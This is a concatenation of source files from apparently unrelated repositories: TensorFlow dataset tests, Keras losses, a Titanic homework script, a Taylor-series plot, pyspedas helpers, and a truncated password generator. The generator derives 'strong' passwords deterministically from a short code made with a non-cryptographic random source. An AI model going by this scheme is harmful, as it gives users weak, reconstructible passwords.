dataset = self._make_csv_dataset(
fn,
defaults=None,
column_names=None,
label_name=None,
select_cols=[1, 3])
expected = [[1, 3], [6, 8]]
features = dataset.make_one_shot_iterator().get_next()
for i in range(len(data)):
self.assertAllEqual(
sess.run(features),
dict(zip([col_names[1], col_names[3]], expected[i])))
# Can specify column names instead of indices
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = self._make_csv_dataset(
fn,
defaults=None,
column_names=None,
label_name=None,
select_cols=[col_names[1], col_names[3]])
expected = [[1, 3], [6, 8]]
features = dataset.make_one_shot_iterator().get_next()
for i in range(len(data)):
self.assertAllEqual(
sess.run(features),
dict(zip([col_names[1], col_names[3]], expected[i])))
def testMakeCSVDataset_withShuffle(self):
total_records = self._num_files * self._num_records
defaults = self.DEFAULTS
for batch_size in [1, 2]:
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Test that shuffling with the same seed produces the same result
dataset1 = self._make_csv_dataset(
self._test_filenames,
defaults,
batch_size=batch_size,
shuffle=True,
shuffle_seed=5)
dataset2 = self._make_csv_dataset(
self._test_filenames,
defaults,
batch_size=batch_size,
shuffle=True,
shuffle_seed=5)
outputs1 = dataset1.make_one_shot_iterator().get_next()
outputs2 = dataset2.make_one_shot_iterator().get_next()
for _ in range(total_records // batch_size):
batch1 = self._run_actual_batch(outputs1, sess)
batch2 = self._run_actual_batch(outputs2, sess)
for i in range(len(batch1)):
self.assertAllEqual(batch1[i], batch2[i])
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
# Test that shuffling with a different seed produces different results
dataset1 = self._make_csv_dataset(
self._test_filenames,
defaults,
batch_size=batch_size,
shuffle=True,
shuffle_seed=5)
dataset2 = self._make_csv_dataset(
self._test_filenames,
defaults,
batch_size=batch_size,
shuffle=True,
shuffle_seed=6)
outputs1 = dataset1.make_one_shot_iterator().get_next()
outputs2 = dataset2.make_one_shot_iterator().get_next()
all_equal = False
for _ in range(total_records // batch_size):
batch1 = self._run_actual_batch(outputs1, sess)
batch2 = self._run_actual_batch(outputs2, sess)
for i in range(len(batch1)):
all_equal = all_equal and np.array_equal(batch1[i], batch2[i])
self.assertFalse(all_equal)
class MakeTFRecordDatasetTest(TFRecordDatasetTestBase):
def _next_expected_batch(self,
file_indices,
batch_size,
num_epochs,
cycle_length,
drop_final_batch,
use_parser_fn):
def _next_record(file_indices):
for j in file_indices:
for i in range(self._num_records):
yield j, i
def _next_record_interleaved(file_indices, cycle_length):
return _interleave([_next_record([i]) for i in file_indices],
cycle_length)
record_batch = []
batch_index = 0
for _ in range(num_epochs):
if cycle_length == 1:
next_records = _next_record(file_indices)
else:
next_records = _next_record_interleaved(file_indices, cycle_length)
for f, r in next_records:
record = self._record(f, r)
if use_parser_fn:
record = record[1:]
record_batch.append(record)
batch_index += 1
if len(record_batch) == batch_size:
yield record_batch
record_batch = []
batch_index = 0
if record_batch and not drop_final_batch:
yield record_batch
def _verify_records(self,
sess,
outputs,
batch_size,
file_index,
num_epochs,
interleave_cycle_length,
drop_final_batch,
use_parser_fn):
if file_index is not None:
file_indices = [file_index]
else:
file_indices = range(self._num_files)
for expected_batch in self._next_expected_batch(
file_indices, batch_size, num_epochs, interleave_cycle_length,
drop_final_batch, use_parser_fn):
actual_batch = sess.run(outputs)
self.assertAllEqual(expected_batch, actual_batch)
def _read_test(self, batch_size, num_epochs, file_index=None,
num_parallel_reads=1, drop_final_batch=False, parser_fn=False):
if file_index is None:
file_pattern = self.test_filenames
else:
file_pattern = self.test_filenames[file_index]
if parser_fn:
fn = lambda x: string_ops.substr(x, 1, 999)
else:
fn = None
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
outputs = readers.make_tf_record_dataset(
file_pattern=file_pattern,
num_epochs=num_epochs,
batch_size=batch_size,
parser_fn=fn,
num_parallel_reads=num_parallel_reads,
drop_final_batch=drop_final_batch,
shuffle=False).make_one_shot_iterator().get_next()
self._verify_records(
sess, outputs, batch_size, file_index, num_epochs=num_epochs,
interleave_cycle_length=num_parallel_reads,
drop_final_batch=drop_final_batch, use_parser_fn=parser_fn)
with self.assertRaises(errors.OutOfRangeError):
sess.run(outputs)
def testRead(self):
for batch_size in [1, 2]:
for num_epochs in [1, 3]:
# Basic test: read from file 0.
self._read_test(batch_size, num_epochs, 0)
# Basic test: read from file 1.
self._read_test(batch_size, num_epochs, 1)
# Basic test: read from both files.
self._read_test(batch_size, num_epochs)
# Basic test: read from both files, with parallel reads.
self._read_test(batch_size, num_epochs, num_parallel_reads=8)
def testDropFinalBatch(self):
for batch_size in [1, 2, 10]:
for num_epochs in [1, 3]:
# Read from file 0.
self._read_test(batch_size, num_epochs, 0, drop_final_batch=True)
# Read from both files.
self._read_test(batch_size, num_epochs, drop_final_batch=True)
# Read from both files, with parallel reads.
self._read_test(batch_size, num_epochs, num_parallel_reads=8,
drop_final_batch=True)
def testParserFn(self):
for batch_size in [1, 2]:
for num_epochs in [1, 3]:
for drop_final_batch in [False, True]:
self._read_test(batch_size, num_epochs, parser_fn=True,
drop_final_batch=drop_final_batch)
self._read_test(batch_size, num_epochs, num_parallel_reads=8,
parser_fn=True, drop_final_batch=drop_final_batch)
def _shuffle_test(self, batch_size, num_epochs, num_parallel_reads=1,
seed=None):
with ops.Graph().as_default() as g:
with self.test_session(graph=g) as sess:
dataset = readers.make_tf_record_dataset(
file_pattern=self.test_filenames,
num_epochs=num_epochs,
batch_size=batch_size,
num_parallel_reads=num_parallel_reads,
shuffle=True,
shuffle_seed=seed)
iterator = dataset.make_initializable_iterator()
next_element = iterator.get_next()
sess.run(iterator.initializer)
first_batches = []
try:
while True:
first_batches.append(sess.run(next_element))
except errors.OutOfRangeError:
pass
sess.run(iterator.initializer)
second_batches = []
try:
while True:
second_batches.append(sess.run(next_element))
except errors.OutOfRangeError:
pass
self.assertEqual(len(first_batches), len(second_batches))
if seed is not None:
# if you set a seed, should get the same results
for i in range(len(first_batches)):
self.assertAllEqual(first_batches[i], second_batches[i])
expected = []
for f in range(self._num_files):
for r in range(self._num_records):
expected.extend([self._record(f, r)] * num_epochs)
for batches in (first_batches, second_batches):
actual = []
for b in batches:
actual.extend(b)
self.assertAllEqual(sorted(expected), sorted(actual))
def testShuffle(self):
for batch_size in [1, 2]:
for num_epochs in [1, 3]:
for num_parallel_reads in [1, 2]:
# Test that all expected elements are produced
self._shuffle_test(batch_size, num_epochs, num_parallel_reads)
# Test that elements are produced in a consistent order if
# you specify a seed.
self._shuffle_test(batch_size, num_epochs, num_parallel_reads,
seed=21345)
if __name__ == "__main__":
test.main()
```
#### File: python/keras/losses.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.python.keras.utils.generic_utils import serialize_keras_object
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import nn
from tensorflow.python.util.tf_export import tf_export
@tf_export('keras.metrics.mean_squared_error',
'keras.losses.mean_squared_error')
def mean_squared_error(y_true, y_pred):
return K.mean(math_ops.square(y_pred - y_true), axis=-1)
@tf_export('keras.metrics.mean_absolute_error',
'keras.losses.mean_absolute_error')
def mean_absolute_error(y_true, y_pred):
return K.mean(math_ops.abs(y_pred - y_true), axis=-1)
@tf_export('keras.metrics.mean_absolute_percentage_error',
'keras.losses.mean_absolute_percentage_error')
def mean_absolute_percentage_error(y_true, y_pred):
diff = math_ops.abs(
(y_true - y_pred) / K.clip(math_ops.abs(y_true), K.epsilon(), None))
return 100. * K.mean(diff, axis=-1)
@tf_export('keras.metrics.mean_squared_logarithmic_error',
'keras.losses.mean_squared_logarithmic_error')
def mean_squared_logarithmic_error(y_true, y_pred):
first_log = math_ops.log(K.clip(y_pred, K.epsilon(), None) + 1.)
second_log = math_ops.log(K.clip(y_true, K.epsilon(), None) + 1.)
return K.mean(math_ops.square(first_log - second_log), axis=-1)
@tf_export('keras.metrics.squared_hinge', 'keras.losses.squared_hinge')
def squared_hinge(y_true, y_pred):
return K.mean(
math_ops.square(math_ops.maximum(1. - y_true * y_pred, 0.)), axis=-1)
@tf_export('keras.metrics.hinge', 'keras.losses.hinge')
def hinge(y_true, y_pred):
return K.mean(math_ops.maximum(1. - y_true * y_pred, 0.), axis=-1)
@tf_export('keras.losses.categorical_hinge')
def categorical_hinge(y_true, y_pred):
pos = math_ops.reduce_sum(y_true * y_pred, axis=-1)
neg = math_ops.reduce_max((1. - y_true) * y_pred, axis=-1)
return math_ops.maximum(0., neg - pos + 1.)
@tf_export('keras.losses.logcosh')
def logcosh(y_true, y_pred):
"""Logarithm of the hyperbolic cosine of the prediction error.
`log(cosh(x))` is approximately equal to `(x ** 2) / 2` for small `x` and
to `abs(x) - log(2)` for large `x`. This means that 'logcosh' works mostly
like the mean squared error, but will not be so strongly affected by the
occasional wildly incorrect prediction.
Arguments:
y_true: tensor of true targets.
y_pred: tensor of predicted targets.
Returns:
Tensor with one scalar loss entry per sample.
"""
def _logcosh(x):
return x + nn.softplus(-2. * x) - math_ops.log(2.)
return K.mean(_logcosh(y_pred - y_true), axis=-1)
@tf_export('keras.metrics.categorical_crossentropy',
'keras.losses.categorical_crossentropy')
def categorical_crossentropy(y_true, y_pred):
return K.categorical_crossentropy(y_true, y_pred)
@tf_export('keras.metrics.sparse_categorical_crossentropy',
'keras.losses.sparse_categorical_crossentropy')
def sparse_categorical_crossentropy(y_true, y_pred):
return K.sparse_categorical_crossentropy(y_true, y_pred)
@tf_export('keras.metrics.binary_crossentropy',
'keras.losses.binary_crossentropy')
def binary_crossentropy(y_true, y_pred):
return K.mean(K.binary_crossentropy(y_true, y_pred), axis=-1)
@tf_export('keras.metrics.kullback_leibler_divergence',
'keras.losses.kullback_leibler_divergence')
def kullback_leibler_divergence(y_true, y_pred):
y_true = K.clip(y_true, K.epsilon(), 1)
y_pred = K.clip(y_pred, K.epsilon(), 1)
return math_ops.reduce_sum(y_true * math_ops.log(y_true / y_pred), axis=-1)
@tf_export('keras.metrics.poisson', 'keras.losses.poisson')
def poisson(y_true, y_pred):
return K.mean(y_pred - y_true * math_ops.log(y_pred + K.epsilon()), axis=-1)
@tf_export('keras.metrics.cosine_proximity', 'keras.losses.cosine_proximity')
def cosine_proximity(y_true, y_pred):
y_true = nn.l2_normalize(y_true, axis=-1)
y_pred = nn.l2_normalize(y_pred, axis=-1)
return -math_ops.reduce_sum(y_true * y_pred, axis=-1)
# Aliases.
mse = MSE = mean_squared_error
mae = MAE = mean_absolute_error
mape = MAPE = mean_absolute_percentage_error
msle = MSLE = mean_squared_logarithmic_error
kld = KLD = kullback_leibler_divergence
cosine = cosine_proximity
@tf_export('keras.losses.serialize')
def serialize(loss):
return serialize_keras_object(loss)
@tf_export('keras.losses.deserialize')
def deserialize(name, custom_objects=None):
return deserialize_keras_object(
name,
module_objects=globals(),
custom_objects=custom_objects,
printable_module_name='loss function')
@tf_export('keras.losses.get')
def get(identifier):
if identifier is None:
return None
if isinstance(identifier, six.string_types):
identifier = str(identifier)
return deserialize(identifier)
if isinstance(identifier, dict):
return deserialize(identifier)
elif callable(identifier):
return identifier
else:
raise ValueError('Could not interpret '
'loss function identifier:', identifier)
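# Usage sketch: `get` accepts a loss name, a serialized config dict, or a callable, e.g.
#   loss_fn = get('mean_squared_error')   # resolved from this module's globals
#   loss_fn = get(mean_squared_error)     # callables are returned unchanged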
``` |
{
"source": "Jibanul/CAP5610_MachineLearning",
"score": 3
} |
#### File: CAP5610_MachineLearning/Homework1/hw1.py
```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import random
from scipy.stats import chi2_contingency
# import data
train_df = pd.read_csv('/Users/mdjibanulhaquejiban/PhD_CRCV/Semesters/Spring2021/ML/HW/HW1/Titanic/train.csv')
test_df = pd.read_csv('/Users/mdjibanulhaquejiban/PhD_CRCV/Semesters/Spring2021/ML/HW/HW1/Titanic/test.csv')
combine = [train_df, test_df]
#######################
## Q1
print(train_df)
print(train_df.describe())
print(train_df.info())
## Q2-Q4
print(train_df.info())
## Q5
print(train_df.info())
print(test_df.info())
## Q6
print(train_df.head())
## Q7
# create a sub-dataframe with only numerical features
train_df_num = train_df[['Age', 'SibSp', 'Parch', 'Fare']]
print(train_df_num.describe())
## Q8
# create a sub-dataframe with only categorical features
train_df_cat = train_df[['Survived', 'Pclass', 'Name', 'Sex', 'Ticket', 'Cabin', 'Embarked', 'PassengerId']]
train_df_cat = train_df_cat.astype('object')
# print(train_df_cat.info())
train_df_cat.describe(include=[object])
## Q9
contigency_table= pd.crosstab(train_df['Pclass'], train_df['Survived'])
print('The contigency table:')
print('\n')
print(contigency_table)
# Chi-Sq test
chi2, p_value, deg_freedom, expected = chi2_contingency(contigency_table)
print('\n')
print('The test statistic is', chi2)
print('\n')
print('The p-value of the test is', p_value)
print('\n')
print('Degrees of freedom is', deg_freedom)
print('\n')
print('The expected frequencies, based on the marginal sums of the table. \n', expected)
## Q10
female = np.where((train_df['Sex']=='female'))
female_survived = np.where((train_df['Sex']=='female') & (train_df['Survived'] == 1))
print("The ratio of female survivals in training set is", len(female_survived[0])/len(female[0]))
## Chi-Sq
contigency_table= pd.crosstab(train_df['Sex'], train_df['Survived'])
print('The contigency table:')
print('\n')
print(contigency_table)
# Chi-Sq test
chi2, p_value, deg_freedom, expected = chi2_contingency(contigency_table)
print('\n')
print('The test statistic is', chi2)
print('\n')
print('The p-value of the test is', p_value)
## Q11
survived_age = train_df.loc[np.where((train_df['Survived'] == 1))]['Age']
not_survived_age = train_df.loc[np.where((train_df['Survived'] == 0))]['Age']
# survived histogram
survived_age.hist(bins=21, color='orange')
plt.xlabel('Age')
plt.ylabel('Frequency')
plt.title('Distribution of Age of People who survived (= 1)')
plt.show()
plt.close()
# not survived histogram
not_survived_age.hist(bins=21, color='tomato')
plt.xlabel('Age')
plt.ylabel('Frequency')
plt.title('Distribution of Age of People who did not survive (= 0)')
plt.show()
plt.close()
## Q12
# Create data
not_survived_pclass1_age = train_df.loc[np.where((train_df['Pclass'] == 1) & (train_df['Survived'] == 0))]['Age']
not_survived_pclass2_age = train_df.loc[np.where((train_df['Pclass'] == 2) & (train_df['Survived'] == 0))]['Age']
not_survived_pclass3_age = train_df.loc[np.where((train_df['Pclass'] == 3) & (train_df['Survived'] == 0))]['Age']
survived_pclass1_age = train_df.loc[np.where((train_df['Pclass'] == 1) & (train_df['Survived'] == 1))]['Age']
survived_pclass2_age = train_df.loc[np.where((train_df['Pclass'] == 2) & (train_df['Survived'] == 1))]['Age']
survived_pclass3_age = train_df.loc[np.where((train_df['Pclass'] == 3) & (train_df['Survived'] == 1))]['Age']
# plot figures
fig, axs = plt.subplots(3,2,figsize=(12,12))
fig.suptitle('Distributions of Age by Pclass and Survived')
axs[0,0].hist(not_survived_pclass1_age, bins=21, color='tomato')
axs[0,0].set_title('Pclass = 1 | Survived = 0')
axs[1,0].hist(not_survived_pclass2_age, bins=21, color='tomato')
axs[1,0].set_title('Pclass = 2 | Survived = 0')
axs[2,0].hist(not_survived_pclass3_age, bins=21, color='tomato')
axs[2,0].set_title('Pclass = 3 | Survived = 0')
axs[0,1].hist(survived_pclass1_age, bins=21, color='orange')
axs[0,1].set_title('Pclass = 1 | Survived = 1')
axs[1,1].hist(survived_pclass2_age, bins=21, color='orange')
axs[1,1].set_title('Pclass = 2 | Survived = 1')
axs[2,1].hist(survived_pclass3_age, bins=21, color='orange')
axs[2,1].set_title('Pclass = 3 | Survived = 1')
plt.show()
plt.close()
# Count number of passengers by pclass
train_df.groupby(['Pclass'])['PassengerId'].count()
train_df.groupby(['Pclass', 'Survived'])['PassengerId'].count()
## Q13
train_df_q13 = train_df.groupby(['Embarked', 'Survived', 'Sex'])['Fare'].mean()
# plot figures
fig, axs = plt.subplots(3,2,figsize=(11,11))
fig.suptitle('Distributions of Average Fare by Embarked, Survived and Sex')
axs[0,0].bar(['female', 'male'],train_df_q13[8:10].values, color='tomato')
axs[0,0].set_title('Embarked = S | Survived = 0')
axs[0,0].set_ylabel('Average Fare')
axs[1,0].bar(['female', 'male'],train_df_q13[:2].values, color='tomato')
axs[1,0].set_title('Embarked = C | Survived = 0')
axs[1,0].set_ylabel('Average Fare')
axs[2,0].bar(['female', 'male'],train_df_q13[4:6].values, color='tomato')
axs[2,0].set_title('Embarked = Q | Survived = 0')
axs[2,0].set_ylabel('Average Fare')
axs[0,1].bar(['female', 'male'],train_df_q13[10:12].values, color='orange')
axs[0,1].set_title('Embarked = S | Survived = 1')
axs[1,1].bar(['female', 'male'],train_df_q13[2:4].values, color='orange')
axs[1,1].set_title('Embarked = C | Survived = 1')
axs[2,1].bar(['female', 'male'],train_df_q13[6:8].values, color='orange')
axs[2,1].set_title('Embarked = Q | Survived = 1')
plt.show()
plt.close()
train_df.groupby(['Embarked', 'Survived', 'Sex'])['Fare'].mean()
train_df.groupby(['Embarked', 'Survived', 'Sex'])['PassengerId'].count()
## Q14
train_df.Ticket.duplicated().value_counts()
## Q15
train_df.Cabin.describe()
test_df.Cabin.describe()
## Q16
train_df['Gender'] = np.where(train_df['Sex']== 'male', 0, 1)
train_df.head(10)
## Q17
# calculate mean and standard deviation
mean = train_df['Age'].mean()
std = train_df['Age'].std()
print('Mean', mean)
print('Standard Deviation', std)
print('\n')
print('Estimated Missing Values in the Age feature.')
# we can randomly pick a value between standard deviation and Mean from Uniform distribution
# to impute missing values
def missing_value_imputation(value):
if np.isnan(value) == True:
value = random.uniform(std, mean)
else:
value = value
return value
# call the above function
train_df['Age'] = train_df['Age'].apply(missing_value_imputation)
## Q18
# find the most frequent value
most_frequent_value = train_df['Embarked'].value_counts().idxmax()
print('The most frequent value in Embarked:', most_frequent_value)
print('\n')
print('The training set with missing Embarked records')
is_na = train_df["Embarked"].isna()
print(train_df[is_na]["Embarked"])
# fill the missing records by the most frequent value
train_df["Embarked"] = train_df["Embarked"].fillna(most_frequent_value)
print('\n')
print('The training set without missing Embarked records')
print(train_df[is_na]["Embarked"])
## Q19
# find the most frequent value
mode = test_df['Fare'].mode()
print('The most frequent value in Fare:', mode)
print('\n')
print('The test set with missing Fare records')
is_na = test_df["Fare"].isna()
print(test_df[is_na]["Fare"])
# fill the missing records by the most frequent value
test_df["Fare"] = test_df["Fare"].fillna(mode[0])
print('\n')
print('The test set without missing Fare records')
print(test_df[is_na]["Fare"])
## Q20
train_df['ordinal_fare'] = np.where(train_df['Fare'] <= 7.91, 0,
(np.where(train_df['Fare'] <= 14.454, 1,
(np.where(train_df['Fare'] <= 31.0, 2, 3)))))
# print first 10 rows
# print(train_df.head(10))
train_df[['PassengerId','Fare','ordinal_fare']].head(10)
# reproduce the table in the question
Avg = pd.DataFrame(train_df.groupby(['ordinal_fare'])['Survived'].mean())
Avg = pd.DataFrame(Avg)
Avg
#### The end ####
``` |
{
"source": "Jibanul/math_in_python",
"score": 4
} |
#### File: math_in_python/taylor_approximation_python/cos_function.py
```python
import time
import pylab as pl
from IPython import display
import numpy as np
def taylor_approx(n):
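    # Plot cos(x) together with its Taylor partial sums about 0,
    # cos(x) ~ sum_{i=0}^{n-1} (-1)^i * x^(2i) / (2i)!, adding one term per frame.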
x = np.linspace(np.pi*(-3), np.pi*(3),100) # values of x from -3*pi to 3*pi
approx = np.zeros(len(x), dtype=np.dtype('O'))
for i in range(n):
approx += ((-1)**i) * (x**(2*i)/np.math.factorial(2*i)) # taylor series of cos(x)
pl.plot(x, np.cos(x))
pl.plot(x, approx)
pl.ylim(-1.7,1.7)
pl.legend(('cos() function', 'Taylor Approximation'), loc = 'upper right')
pl.text(x = -8, y = 1.25, s = "n = " + str(i), fontsize=15)
display.clear_output(wait=True)
display.display(pl.gcf())
pl.clf()
        time.sleep(1.0) # pause 1 sec before plotting the next curve
# call the function
taylor_approx(n = 13)
``` |
{
"source": "jibarnum/pyspedas",
"score": 2
} |
#### File: pyspedas/maven/__init__.py
```python
from .maven_load import load_data
def maven_load(instruments=None,
kp_instruments=None,
start_date='2014-01-01',
end_date='2020-01-01',
update_prefs=False,
only_update_prefs=False,
local_dir=None,
list_files=False,
new_files=False,
exclude_orbit_file=False,
download_only=False,
varformat=None,
prefix='',
suffix='',
get_support_data=False,
public=True):
"""
Main function for downloading MAVEN data and loading it into tplot variables (if applicable).
Parameters:
instruments: str/list of str
Instruments from which you want to download data. This is where you can indicate that you want to
download KP data (via 'kp-insitu' for KP in situ data or 'kp-iuvs' for KP iuvs data).
kp_instruments: str/list of str
            Instruments from which you want to grab KP in situ data. Only relevant when downloading
            KP in situ data, and optional even then: if not specified, KP in situ data is downloaded
            for all instruments with in situ data.
        list_files: bool (True/False)
If true, lists the files instead of downloading them.
new_files: bool (True/False)
Checks downloaded files and only downloads those that haven't already been downloaded.
start_date: str
String that is the start date for downloading data (YYYY-MM-DD)
end_date: str
String that is the end date for downloading data (YYYY-MM-DD)
update_prefs: bool (True/False)
If true, updates where you want to store data locally
only_update_prefs: bool (True/False)
            If true, *only* updates where to store data locally; doesn't download files.
exclude_orbit_file: bool (True/False)
If true, won't download the latest orbit tables.
local_dir: str
If indicated, specifies where to download files for a specific implementation of this function.
download_only: bool (True/False)
If True then files are downloaded only,
if False then CDF files are also loaded into pytplot using cdf_to_tplot.
varformat : str
The file variable formats to load into tplot. Wildcard character
"*" is accepted. By default, all variables are loaded in.
prefix: str
The tplot variable names will be given this prefix.
By default, no prefix is added.
suffix: str
The tplot variable names will be given this suffix.
By default, no suffix is added.
get_support_data: bool
Data with an attribute "VAR_TYPE" with a value of "support_data"
will be loaded into tplot. By default, only loads in data with a
"VAR_TYPE" attribute of "data".
public: bool
If True, downloads data from the MAVEN public website.
If False, downloads data from the MAVEN private website (will ask for username/password).
"""
tvars = load_data(instruments=instruments, kp_instruments=kp_instruments, start_date=start_date, end_date=end_date,
update_prefs=update_prefs, only_update_prefs=only_update_prefs, local_dir=local_dir,
list_files=list_files, new_files=new_files, exclude_orbit_file=exclude_orbit_file,
download_only=download_only, varformat=varformat, prefix=prefix, suffix=suffix,
get_support_data=get_support_data, public=public)
return tvars
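# Minimal usage sketch (instrument name and dates are illustrative; the corresponding
# MAVEN data must be available for the requested range):
#   tvars = maven_load(instruments='mag',
#                      start_date='2015-12-25', end_date='2015-12-26')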
```
#### File: pyspedas/maven/kp_to_tplot.py
```python
import pytplot
def kp_to_tplot(insitu):
"""Creates tplot variables from the insitu variable
"""
# Keep track of stored KP variables
stored_variables = []
# initialize each instrument
inst_list = ["EUV", "LPW", "STATIC", "SWEA", "SWIA", "MAG", "SEP", "NGIMS"]
for instrument in inst_list:
# for each observation for each instrument
if insitu[instrument] is not None:
for obs in insitu[instrument]:
# create variable name
obs_specific = "mvn_kp::" + instrument.lower() + "::" + obs.lower()
# if NaN or string, continue
if insitu[instrument][obs].isnull().all() or insitu[instrument][obs].dtype == 'O':
continue
# store data in tplot variable
pytplot.store_data(obs_specific, data={'x': insitu['Time'], 'y': insitu[instrument][obs]})
if obs_specific not in stored_variables:
stored_variables.append(obs_specific)
return stored_variables
```
#### File: mms/eis/mms_eis_omni.py
```python
import numpy as np
from pytplot import get_data, store_data, options
from ...utilities.tnames import tnames
def mms_eis_omni(probe, species='proton', datatype='extof', suffix='', data_units='flux', data_rate='srvy'):
probe = str(probe)
species_str = datatype+'_'+species
if data_rate == 'brst':
prefix = 'mms'+probe+'_epd_eis_brst_'
    else:
        prefix = 'mms'+probe+'_epd_eis_'
telescopes = tnames(pattern=prefix + species_str + '_*' + data_units + '_t?'+suffix)
if len(telescopes) > 0:
time, data, energies = get_data(telescopes[0])
flux_omni = np.zeros((len(time), len(energies)))
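        # Sum the flux over all telescopes; the total is divided by 6 below
        # (the number of EIS telescopes) to form the omni-directional average.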
for t in telescopes:
time, data, energies = get_data(t)
flux_omni = flux_omni + data
store_data(prefix+species_str+'_'+data_units+'_omni'+suffix, data={'x': time, 'y': flux_omni/6., 'v': energies})
options(prefix+species_str+'_'+data_units+'_omni'+suffix, 'spec', 1)
options(prefix+species_str+'_'+data_units+'_omni'+suffix, 'ylog', 1)
options(prefix+species_str+'_'+data_units+'_omni'+suffix, 'zlog', 1)
options(prefix+species_str+'_'+data_units+'_omni'+suffix, 'yrange', [14, 45])
options(prefix+species_str+'_'+data_units+'_omni'+suffix, 'Colormap', 'jet')
print(prefix+species_str+'_'+data_units+'_omni'+suffix)
```
#### File: pyspedas/pyspedas/prefs.py
```python
import os
def get_prefs_filename():
dir_path = os.path.abspath(os.path.dirname(__file__))
fname = os.path.join(dir_path, 'spd_prefs_txt.py')
print(fname)
return fname
def get_spedas_prefs():
"""Get all the spedas preferences and return a directory"""
fname = get_prefs_filename()
print("Preferences file: " + fname)
"""Read preferences"""
with open(fname, 'r') as f:
content = f.readlines()
content = [x.strip() for x in content]
"""Fill dictionary"""
ans_dict = {}
for line in content:
if len(line) > 2 and line[0] != "#":
terms = line.split('=')
terms = [x.strip() for x in terms]
if len(terms) == 2:
if terms[0] != '' and terms[1] != '':
ans_dict[terms[0].replace("'", "")] = terms[1].replace("'",
"")
f.closed
return ans_dict
def set_spedas_prefs(var_name, var_value):
"""Get all the spedas preferences and return a directory"""
found = 0
if var_name == '' or var_value == '':
return found
fname = get_prefs_filename()
print("Preferences file: " + fname)
"""Read preferences"""
with open(fname, 'r') as f:
content = f.readlines()
content = [x.strip() for x in content]
"""Make change"""
new_content = ''
for line in content:
new_line = line
if len(line) > 2 and line[0] != "#":
terms = line.split('=')
terms = [x.strip() for x in terms]
if len(terms) == 2:
if terms[0] != '' and terms[1] != '':
if terms[0] == var_name:
new_line = var_name + "='" + var_value + "'"
found = 1
new_line = new_line.replace(os.linesep, '\n').strip()
if new_line != '':
new_content += new_line + '\n'
with open(fname, 'w') as f:
f.write(new_content)
f.closed
return found
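# Usage sketch (the preference name is illustrative and must already exist in
# spd_prefs_txt.py, since only existing entries are updated):
#   if set_spedas_prefs('data_dir', '/tmp/spedas_data'):
#       print(get_spedas_prefs()['data_dir'])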
``` |
{
"source": "JibbleEinuxCODE/PassGenR",
"score": 4
} |
#### File: JibbleEinuxCODE/PassGenR/setup.py
```python
import string
import random
# Logo of this tool: just prints out ASCII art.
print('-------------------------------------------------------------------')
print('██████ █████ ███████ ███████ ██████ ███████ ███ ██ ██████ ')
print('██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ')
print('██████ ███████ ███████ ███████ ██ ███ █████ ██ ██ ██ ██████ ')
print('██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ')
print('██ ██ ██ ███████ ███████ ██████ ███████ ██ ████ ██ ██ ')
print('-------------------------------------------------------------------')
print('----------Hi everyone, welcome to the password generator tool----------')
print('                This tool was created by @Jibble Einux                  ')
print('          Follow on GitHub, Facebook: @JibbleEinuxCODE                  ')
# This function creates a random authentication code
# and derives a random password from it,
# so you can generate easy, normal, strong and extra-strong passwords.
def get_random_string(length):
letters = string.ascii_lowercase
result_str = ''.join(random.choice(letters) for i in range(length))
print('\n')
print('----------------------------------------------------')
print('Your authentication code is generated: ' + result_str)
print('----------------------------------------------------')
    print('You Can Find Your Password (if you forget your password) with this Authentication Code.')
passWord = (str(len(result_str)) + str(result_str[:2].lower()) + str(result_str[:1:-2].upper()) + "-" + str(result_str.count(result_str)) + str(result_str[:1].upper()) + "X" + "6" + "_" + "D" + str(
result_str[0::3].lower()) + str(result_str.count(result_str)) + "X" + "f" + str(result_str[:4].lower()) + "+" + str(result_str[4::-1].upper())).strip().replace(" ", "")
print('----------------------------------------------------')
print('Your Password is: ' + passWord)
print('----------------------------------------------------')
# This function recovers a password if you have forgotten it:
# you just enter your random or custom authentication code,
# and the function re-creates your password, which matches your old one
# because the same authentication code always produces the same password.
def find_password_string():
print('\n')
result_str = input('Enter You Authentication Code: ')
passWord = (str(len(result_str)) + str(result_str[:2].lower()) + str(result_str[:1:-2].upper()) + "-" + str(result_str.count(result_str)) + str(result_str[:1].upper()) + "X" + "6" + "_" + "D" + str(
result_str[0::3].lower()) + str(result_str.count(result_str)) + "X" + "f" + str(result_str[:4].lower()) + "+" + str(result_str[4::-1].upper())).strip().replace(" ", "")
print('----------------------------------------------------')
print('Your Password is: ' + passWord)
print('----------------------------------------------------')
# This section lets the user choose a custom authentication code that is easy to remember,
# so the password can be recovered easily later.
def custom_auth_Code():
print('\n')
result_str = input('Enter You Custom Authentication Code: ')
passWord = (str(len(result_str)) + str(result_str[:2].lower()) + str(result_str[:1:-2].upper()) + "-" + str(result_str.count(result_str)) + str(result_str[:1].upper()) + "X" + "6" + "_" + "D" + str(
result_str[0::3].lower()) + str(result_str.count(result_str)) + "X" + "f" + str(result_str[:4].lower()) + "+" + str(result_str[4::-1].upper())).strip().replace(" ", "")
print('----------------------------------------------------')
print('Your Custom authentication code is: ' + result_str)
print('----------------------------------------------------')
print('You Can Easily Find/Re-create Your Password with this Authentication Code.')
print('----------------------------------------------------')
print('Your Password is: ' + passWord)
print('----------------------------------------------------')
# printing services
# and details
while True:
print('\n')
print('The services of PassGenR tool are:')
print('1.Create a New random password')
print('2.Create a New custom password')
print('3.find your forgotten password')
print('4.Contact me')
print('type 99 for Exit ')
    print('Choose your service (1-4)')
serviceChose = int(input('PassGenR >> '))
if serviceChose == 99:
break
# random password session
if serviceChose == 1:
        print('There are some password types:')
print('1.Easy \n2.normal \n3.Strong \n4.Extra-Strong')
print('Enter Your Password type(1-4): ')
passwordType = int(input())
        # choose the length parameter for the random password function
if passwordType == 1:
get_random_string(8)
elif passwordType == 2:
get_random_string(12)
elif passwordType == 3:
get_random_string(16)
else:
get_random_string(20)
# creating custom password session
elif serviceChose == 2:
        print('You can easily make your own authentication code')
custom_auth_Code()
# finding forgotten password session
elif serviceChose == 3:
find_password_string()
# about session for myself
